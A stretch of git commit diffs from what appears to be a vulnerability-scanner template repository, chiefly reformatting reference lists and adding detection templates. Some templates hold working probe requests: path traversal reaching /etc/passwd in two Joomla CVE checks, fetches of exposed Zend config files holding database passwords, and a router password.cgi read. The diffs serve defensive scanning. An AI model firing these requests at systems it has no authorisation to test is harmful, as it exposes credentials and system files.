https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d tags: exposure,config,lfi,nginx diff --git a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml index 8346865b45..dfad086cc8 100644 --- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml +++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml @@ -5,7 +5,7 @@ info: author: berkdusunur severity: critical tags: rce - reference: | + reference: - https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml index a7093da6d6..57dc49ae6e 100644 --- a/vulnerabilities/other/opensns-rce.yaml +++ b/vulnerabilities/other/opensns-rce.yaml @@ -4,7 +4,7 @@ info: name: OpenSNS Remote Code Execution Vulnerability author: gy741 severity: critical - reference: | + reference: - http://www.0dayhack.net/index.php/2417/ - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: opensns,rce diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index 055c33da1e..7c4f59db40 100644 --- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: | + reference: - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai tags: optiLink,rce,oob diff --git a/vulnerabilities/other/resin-cnnvd-200705-315.yaml b/vulnerabilities/other/resin-cnnvd-200705-315.yaml index e35605cb4b..8cb1cfac33 100644 --- a/vulnerabilities/other/resin-cnnvd-200705-315.yaml +++ b/vulnerabilities/other/resin-cnnvd-200705-315.yaml @@ -3,7 +3,7 @@ info: name: Caucho Resin Information Disclosure author: princechaddha severity: high - reference: | + reference: - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 tags: resin,caucho,lfr diff --git a/vulnerabilities/other/resin-viewfile-lfr.yaml b/vulnerabilities/other/resin-viewfile-lfr.yaml index 9733ccd186..27b8d5798e 100644 --- a/vulnerabilities/other/resin-viewfile-lfr.yaml +++ b/vulnerabilities/other/resin-viewfile-lfr.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: high description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files. - reference: | + reference: - http://0day5.com/archives/1173/ - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 tags: resin,caucho,lfr diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 5f2afa5a6d..417e1cbc8a 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -4,7 +4,7 @@ info: name: Sonicwall SSLVPN ShellShock RCE author: PR3R00T severity: critical - reference: | + reference: - https://twitter.com/chybeta/status/1353974652540882944 - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ tags: shellshock,sonicwall,rce,vpn diff --git a/vulnerabilities/other/ueditor-file-upload.yaml b/vulnerabilities/other/ueditor-file-upload.yaml index c96599a905..07225c62db 100644 --- a/vulnerabilities/other/ueditor-file-upload.yaml +++ b/vulnerabilities/other/ueditor-file-upload.yaml @@ -3,7 +3,7 @@ info: name: UEditor Arbitrary File Upload author: princechaddha severity: high - reference: | + reference: - https://zhuanlan.zhihu.com/p/85265552 - https://www.freebuf.com/vuls/181814.html tags: ueditor,fileupload diff --git a/vulnerabilities/other/visual-tools-dvr-rce.yaml b/vulnerabilities/other/visual-tools-dvr-rce.yaml index 39f9c70291..b2c31e9384 100644 --- a/vulnerabilities/other/visual-tools-dvr-rce.yaml +++ b/vulnerabilities/other/visual-tools-dvr-rce.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. - reference: | + reference: - https://www.exploit-db.com/exploits/50098 tags: visualtools,rce,oob diff --git a/vulnerabilities/other/wems-manager-xss.yaml b/vulnerabilities/other/wems-manager-xss.yaml index b3f7b4ace4..b73ec6dc84 100644 --- a/vulnerabilities/other/wems-manager-xss.yaml +++ b/vulnerabilities/other/wems-manager-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium tags: xss - reference: | + reference: - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html requests: diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index 0d124b59f7..d3c9c3cab1 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical tags: yapi,rce - reference: | + reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index f179eeb090..a8c7121123 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0,ipanda severity: high description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. - reference: | + reference: - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/mpgn/Spring-Boot-Actuator-Exploit tags: springboot,jolokia,xxe diff --git a/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml index 04a9bc4ee0..210c9f5638 100644 --- a/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -8,7 +8,7 @@ info: # Payload taken from @pyn3rd (Twitter), see reference[2]. - reference: | + reference: - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database - https://twitter.com/pyn3rd/status/1305151887964946432 - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index c990d11794..41ef6979b6 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -4,7 +4,7 @@ info: name: VMware vCenter Unauthenticated Arbitrary File Read author: dwisiswant0 severity: high - reference: | + reference: - https://kb.vmware.com/s/article/7960893 - https://twitter.com/ptswarm/status/1316016337550938122 tags: vmware,lfi diff --git a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml index 484142c509..8dda442e3f 100644 --- a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml +++ b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml @@ -5,7 +5,7 @@ info: severity: medium tags: wordpress,wp-plugin description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. - reference: | + reference: - https://wpvulndb.com/vulnerabilities/8644 - https://klikki.fi/adv/w3_total_cache.html diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml index 6b2f2e9a82..a536f56a59 100644 --- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml +++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml @@ -5,7 +5,7 @@ info: author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical tags: wordpress,woocomernce,sqli,wp-plugin - reference: | + reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx diff --git a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index 94a0aa150e..28476103e4 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -3,7 +3,7 @@ info: name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure author: 0x_Akoko severity: high - reference: | + reference: - https://www.exploit-db.com/exploits/48061 - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ tags: wordpress,wp-plugin,lfi,wordfence diff --git a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml index 054a5819d2..bf94656f63 100644 --- a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml +++ b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml @@ -6,7 +6,7 @@ info: severity: high description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials tags: wordpress,plugin - reference: | + reference: - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ diff --git a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml index 100c8568d1..5b19ad3ae3 100644 --- a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml @@ -1,28 +1,28 @@ -id: wp-123contactform-plugin-listing - -info: - name: WordPress 123ContactForm Plugin Directory Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: | - - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - - https://www.exploit-db.com/ghdb/6979 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/123contactform-for-wordpress" - condition: and - - - type: status - status: - - 200 +id: wp-123contactform-plugin-listing + +info: + name: WordPress 123ContactForm Plugin Directory Listing + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: + - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html + - https://www.exploit-db.com/ghdb/6979 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/123contactform-for-wordpress" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml index 4091668e07..b4305c81e7 100644 --- a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml +++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml @@ -6,7 +6,7 @@ info: severity: high tags: wordpress,wp-plugin,lfi description: Arbitrary file download in Memphis Document Library 3.1.5 - reference: | + reference: - https://www.exploit-db.com/exploits/39593 - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f diff --git a/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/vulnerabilities/wordpress/wp-socialfit-xss.yaml index 3da8d47f03..56b6690c8f 100644 --- a/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: | + reference: - https://www.exploit-db.com/exploits/37481 tags: wordpress,xss,wp-plugin From 09cf9f35ebfbee5b543544cd326502b2b79b888f Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 18 Aug 2021 20:54:49 +0700 Subject: [PATCH 1720/4083] Update matcher using regex instead --- cves/2021/CVE-2021-38751.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 5a72faa37d..622d086de0 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -19,16 +19,14 @@ requests: path: - "{{BaseURL}}/" headers: - Host: "{{randstr}}.com" + Host: "{{randstr}}.tld" matchers-condition: and matchers: - - type: word - words: - - '' - - '' + - type: regex + regex: + - "https?://{{randstr}}\\.tld" part: body - condition: or - type: status status: From 460e2ca91d4173641425be46475ce8945e00dcbd Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 18 Aug 2021 20:57:56 +0700 Subject: [PATCH 1721/4083] Add ignored stuff from update-templates flag --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.gitignore b/.gitignore index b9f06cbe7c..00293d5ab6 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,4 @@ .DS_Store local/ +.checksum +.new-additions \ No newline at end of file From ab0750b57033c8051a14b4155a0c0879edb73f4a Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 19 Aug 2021 00:43:44 +0530 Subject: [PATCH 1722/4083] minor update --- vulnerabilities/other/microstrategy-ssrf.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml index 37946bac10..c6a6969e69 100644 --- a/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/vulnerabilities/other/microstrategy-ssrf.yaml @@ -1,4 +1,5 @@ id: microstrategy-ssrf + info: name: MicroStrategy tinyurl - BSSRF author: organiccrap @@ -12,8 +13,7 @@ requests: path: - '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: From 6a8d9e0687914c900abf1ec22ce2bb81b2cf0f5b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 18 Aug 2021 14:44:12 -0500 Subject: [PATCH 1723/4083] Update and rename misconfiguration/sidekiq-dashboard.yaml to exposed-panels/sidekiq-dashboard.yaml Added references. Moved template to exposed-panels. --- {misconfiguration => exposed-panels}/sidekiq-dashboard.yaml | 3 +++ 1 file changed, 3 insertions(+) rename {misconfiguration => exposed-panels}/sidekiq-dashboard.yaml (81%) diff --git a/misconfiguration/sidekiq-dashboard.yaml b/exposed-panels/sidekiq-dashboard.yaml similarity index 81% rename from misconfiguration/sidekiq-dashboard.yaml rename to exposed-panels/sidekiq-dashboard.yaml index 2b3cba9c5e..d7907a2cef 100644 --- a/misconfiguration/sidekiq-dashboard.yaml +++ b/exposed-panels/sidekiq-dashboard.yaml @@ -3,6 +3,9 @@ id: sidekiq-dashboard info: name: sidekiq-dashboard author: dhiyaneshDK + reference: + - https://sidekiq.org + - https://github.com/mperham/sidekiq severity: medium tags: unauth From 33ec4eddbf51c0165bdccc1315371fe31c3c25d6 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Thu, 19 Aug 2021 06:39:09 +0700 Subject: [PATCH 1724/4083] Update regEx matcher --- cves/2021/CVE-2021-38751.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 622d086de0..8d5172063c 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -18,6 +18,7 @@ requests: - method: GET path: - "{{BaseURL}}/" + - "{{BaseURL}}/login/showlogin" headers: Host: "{{randstr}}.tld" @@ -25,7 +26,7 @@ requests: matchers: - type: regex regex: - - "https?://{{randstr}}\\.tld" + - (EXPONENT\.(?:(?:J(?:QUERY|S)_UR|URL_FUL)|YUI2_UR)L=")?https?://{{randstr}}\.tld part: body - type: status From 935430d1000666c88b8f67139540da57b28e2d55 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 19 Aug 2021 08:25:16 +0700 Subject: [PATCH 1725/4083] Create CVE-2010-1657.yaml --- cves/2010/CVE-2010-1657.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1657.yaml diff --git a/cves/2010/CVE-2010-1657.yaml b/cves/2010/CVE-2010-1657.yaml new file mode 100644 index 0000000000..9ca7b026c8 --- /dev/null +++ b/cves/2010/CVE-2010-1657.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1657 + +info: + name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12428 + - https://www.cvedetails.com/cve/CVE-2010-1657 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From a60a9528e3b56174083d02cc49a6a4492bf7c811 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 19 Aug 2021 08:29:39 +0700 Subject: [PATCH 1726/4083] Create CVE-2010-2033.yaml --- cves/2010/CVE-2010-2033.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2033.yaml diff --git a/cves/2010/CVE-2010-2033.yaml b/cves/2010/CVE-2010-2033.yaml new file mode 100644 index 0000000000..feea7b250f --- /dev/null +++ b/cves/2010/CVE-2010-2033.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2033 + +info: + name: Joomla Percha Categories Tree 0.6 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html + - https://www.cvedetails.com/cve/CVE-2010-2033 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 4d9bd2d13b9b401386291b29ac4276ec887699dd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 14:27:45 +0530 Subject: [PATCH 1727/4083] Update zend-config-file.yaml --- exposures/configs/zend-config-file.yaml | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/exposures/configs/zend-config-file.yaml b/exposures/configs/zend-config-file.yaml index 8c3039bfeb..fd823f7d9b 100644 --- a/exposures/configs/zend-config-file.yaml +++ b/exposures/configs/zend-config-file.yaml @@ -2,7 +2,7 @@ id: zend-config-file info: name: Zend Configuration File - author: pdteam + author: pdteam,geeknik severity: high tags: config,exposure,zend,php @@ -10,12 +10,26 @@ requests: - method: GET path: - "{{BaseURL}}/application/configs/application.ini" + - "{{BaseURL}}/admin/configs/application.ini" + - "{{BaseURL}}/application.ini" + - "{{BaseURL}}/aplicacao/application/configs/application.ini" + - "{{BaseURL}}/cloudexp/application/configs/application.ini" + - "{{BaseURL}}/cms/application/configs/application.ini" + - "{{BaseURL}}/moto/application/configs/application.ini" + - "{{BaseURL}}/Partners/application/configs/application.ini" + - "{{BaseURL}}/radio/application/configs/application.ini" + - "{{BaseURL}}/seminovos/application/configs/application.ini" + - "{{BaseURL}}/shop/application/configs/application.ini" + - "{{BaseURL}}/site_cg/application/configs/application.ini" + - "{{BaseURL}}/slr/application/configs/application.ini" matchers-condition: and matchers: - type: word words: - "resources.db.params.password" + - "resources.db.params.username" + condition: and - type: word words: From 33ea2d360c011d368ad716cdf241413c751b6e00 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 14:45:37 +0530 Subject: [PATCH 1728/4083] Create comtrend-ct5367-disclosure.yaml --- .../other/comtrend-ct5367-disclosure.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/comtrend-ct5367-disclosure.yaml diff --git a/vulnerabilities/other/comtrend-ct5367-disclosure.yaml b/vulnerabilities/other/comtrend-ct5367-disclosure.yaml new file mode 100644 index 0000000000..a69cfc9e55 --- /dev/null +++ b/vulnerabilities/other/comtrend-ct5367-disclosure.yaml @@ -0,0 +1,26 @@ +id: comtrend-ct5367-rce + +info: + name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution + author: geeknik + severity: high + reference: https://www.exploit-db.com/exploits/16275 + tags: router,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/password.cgi" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pwdAdmin =" + - "pwdSupport =" + - "pwdUser =" + condition: and From f8a89684086abd1193e230a94f74b40d0033c096 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 14:46:35 +0530 Subject: [PATCH 1729/4083] Revert "Create comtrend-ct5367-disclosure.yaml" This reverts commit 33ea2d360c011d368ad716cdf241413c751b6e00. --- .../other/comtrend-ct5367-disclosure.yaml | 26 ------------------- 1 file changed, 26 deletions(-) delete mode 100644 vulnerabilities/other/comtrend-ct5367-disclosure.yaml diff --git a/vulnerabilities/other/comtrend-ct5367-disclosure.yaml b/vulnerabilities/other/comtrend-ct5367-disclosure.yaml deleted file mode 100644 index a69cfc9e55..0000000000 --- a/vulnerabilities/other/comtrend-ct5367-disclosure.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: comtrend-ct5367-rce - -info: - name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution - author: geeknik - severity: high - reference: https://www.exploit-db.com/exploits/16275 - tags: router,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/password.cgi" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "pwdAdmin =" - - "pwdSupport =" - - "pwdUser =" - condition: and From bc1bf5d91902c0c3a114cb78ca0681b1d71d3d28 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 14:47:44 +0530 Subject: [PATCH 1730/4083] Create comtrend-ct5367-disclosure.yaml --- .../other/comtrend-ct5367-disclosure.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/comtrend-ct5367-disclosure.yaml diff --git a/vulnerabilities/other/comtrend-ct5367-disclosure.yaml b/vulnerabilities/other/comtrend-ct5367-disclosure.yaml new file mode 100644 index 0000000000..a69cfc9e55 --- /dev/null +++ b/vulnerabilities/other/comtrend-ct5367-disclosure.yaml @@ -0,0 +1,26 @@ +id: comtrend-ct5367-rce + +info: + name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution + author: geeknik + severity: high + reference: https://www.exploit-db.com/exploits/16275 + tags: router,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/password.cgi" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pwdAdmin =" + - "pwdSupport =" + - "pwdUser =" + condition: and From d10c81b2ba5bad760ed964cdab9a7c4486027f19 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 14:56:35 +0530 Subject: [PATCH 1731/4083] Create couchbase-buckets-rest-api.yaml --- .../apis/couchbase-buckets-rest-api.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposures/apis/couchbase-buckets-rest-api.yaml diff --git a/exposures/apis/couchbase-buckets-rest-api.yaml b/exposures/apis/couchbase-buckets-rest-api.yaml new file mode 100644 index 0000000000..cf1504c0d4 --- /dev/null +++ b/exposures/apis/couchbase-buckets-rest-api.yaml @@ -0,0 +1,33 @@ +id: couchbase-buckets-rest-api + +info: + name: Couchbase Buckets REST API - Unauthenticated + author: geeknik + severity: info + reference: + - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html + - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html + tags: exposure,couchbase + +requests: + - method: GET + path: + - "{{BaseURL}}/pools/default/buckets" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"couchbase":' + - '"bucket":' + - '"data":' + condition: and + + - type: word + part: header + words: + - 'application/json' From 20e66005b7cd2205696ecb276c4bb88681fa8f83 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 14:57:01 +0530 Subject: [PATCH 1732/4083] Update and rename couchbase-buckets-rest-api.yaml to couchbase-buckets-api.yaml --- ...uchbase-buckets-rest-api.yaml => couchbase-buckets-api.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposures/apis/{couchbase-buckets-rest-api.yaml => couchbase-buckets-api.yaml} (95%) diff --git a/exposures/apis/couchbase-buckets-rest-api.yaml b/exposures/apis/couchbase-buckets-api.yaml similarity index 95% rename from exposures/apis/couchbase-buckets-rest-api.yaml rename to exposures/apis/couchbase-buckets-api.yaml index cf1504c0d4..37dba5b3ce 100644 --- a/exposures/apis/couchbase-buckets-rest-api.yaml +++ b/exposures/apis/couchbase-buckets-api.yaml @@ -1,4 +1,4 @@ -id: couchbase-buckets-rest-api +id: couchbase-buckets-api info: name: Couchbase Buckets REST API - Unauthenticated From 4c27b5d5ee18d0769771134bcf9718697a022840 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 15:00:00 +0530 Subject: [PATCH 1733/4083] Create db-schema.yaml --- exposures/files/db-schema.yaml | 36 ++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposures/files/db-schema.yaml diff --git a/exposures/files/db-schema.yaml b/exposures/files/db-schema.yaml new file mode 100644 index 0000000000..0f1b1437f8 --- /dev/null +++ b/exposures/files/db-schema.yaml @@ -0,0 +1,36 @@ +id: db-schema.yaml + +info: + name: Discover db schema files + description: This file is auto-generated from the current state of the database. + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/db/schema.rb" + - "{{BaseURL}}/database/schema.rb" + - "{{BaseURL}}/schema.rb" + + matchers-condition: and + matchers: + - type: word + words: + - "This file is auto-generated from the current state of the database." + - "ActiveRecord::Schema.define" + condition: and + - type: word + part: header + words: + - "text/html" + negative: true + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + regex: + - 'version: \d{14}' From 760af33ce9f1d659b40d2baaaf5e7d296df489c3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 15:03:10 +0530 Subject: [PATCH 1734/4083] Update db-schema.yaml --- exposures/files/db-schema.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/exposures/files/db-schema.yaml b/exposures/files/db-schema.yaml index 0f1b1437f8..86adb0bfa1 100644 --- a/exposures/files/db-schema.yaml +++ b/exposures/files/db-schema.yaml @@ -1,10 +1,10 @@ -id: db-schema.yaml +id: db-schema info: name: Discover db schema files - description: This file is auto-generated from the current state of the database. author: geeknik severity: info + description: This file is auto-generated from the current state of the database. requests: - method: GET @@ -15,22 +15,26 @@ requests: matchers-condition: and matchers: + - type: word words: - "This file is auto-generated from the current state of the database." - "ActiveRecord::Schema.define" condition: and + - type: word part: header words: - "text/html" negative: true + - type: status status: - 200 + extractors: - type: regex name: version part: body regex: - - 'version: \d{14}' + - 'eRecord::Schema\.define\(version: ([0-9_]+)\) do' From 673fe8066015f42d19f589867483d6e8d9f9ef15 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 19 Aug 2021 18:37:59 +0900 Subject: [PATCH 1735/4083] Create CVE-2020-25223.yaml A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11 Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-25223.yaml | 36 